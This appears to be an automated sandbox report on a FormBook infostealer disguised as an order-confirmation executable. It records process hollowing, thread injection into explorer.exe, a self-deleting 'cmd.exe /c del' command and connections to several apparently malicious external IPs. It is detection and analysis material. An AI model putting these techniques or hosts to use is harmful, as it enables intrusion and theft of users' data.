          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E1849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E2746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EB8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E86DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ED05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ED05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E43D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E83540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E27D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E0AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ECE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ED8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E8A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E48EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EBFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ED8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E9FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E1766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ECAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ECAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E0E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EBFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E38E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00EC1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E18794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00E1FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 2_2_00ED8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B5A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B5A354 SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 172.120.228.88 80
          Source: C:\Windows\explorer.exe | Network Connect: 192.249.115.168 80
          Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe | Network Connect: 46.38.226.47 80
          Source: C:\Windows\explorer.exe | Network Connect: 118.27.99.25 80
          Source: C:\Windows\explorer.exe | Network Connect: 192.0.78.25 80
          Source: C:\Windows\explorer.exe | Network Connect: 3.13.31.214 80
          Source: C:\Windows\explorer.exe | Network Connect: 149.210.170.235 80
          Source: C:\Windows\explorer.exe | Network Connect: 69.163.224.168 80
          Source: C:\Windows\explorer.exe | Network Connect: 51.195.43.214 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Network Connect: 3.0.139.114 80
          Source: C:\Windows\explorer.exe | Network Connect: 192.254.186.135 80
          Source: C:\Windows\explorer.exe | Network Connect: 154.204.140.233 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Thread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Section unmapped: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe base address: 400000
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 3D0000
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B89369 LogonUserW,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B45240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B45EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,KiUserCallbackDispatcher,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B951E2 mouse_event,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Process created: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe'
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B94F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259950847.00000000027A4000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.251766943.0000000000BE6000.00000002.00020000.sdmp, 9rd1hxro.exe, 00000002.00000000.242902621.00000000004B6000.00000002.00020000.sdmp, NETSTAT.EXE, 0000000C.00000002.628326258.0000000003B0D000.00000004.00000001.sdmp, 9rd1hxro.exe.1.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: lqqebhptsg.exe, explorer.exe, 00000004.00000002.626152318.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.628714673.00000000055C0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.626152318.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.628714673.00000000055C0000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.626152318.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.628714673.00000000055C0000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000002.625354816.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000002.626152318.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.628714673.00000000055C0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000002.626152318.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.628714673.00000000055C0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B5885B cpuid
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B70030 GetLocalTime,__swprintf,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B70722 GetUserNameW,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B6416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe | Code function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
          Source: lqqebhptsg.exe | Binary or memory string: WIN_81
          Source: lqqebhptsg.exe | Binary or memory string: WIN_XP
          Source: lqqebhptsg.exe | Binary or memory string: WIN_XPe
          Source: lqqebhptsg.exe | Binary or memory string: WIN_VISTA
          Source: lqqebhptsg.exe | Binary or memory string: WIN_7
          Source: lqqebhptsg.exe | Binary or memory string: WIN_8
          Source: 9rd1hxro.exe.1.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORY
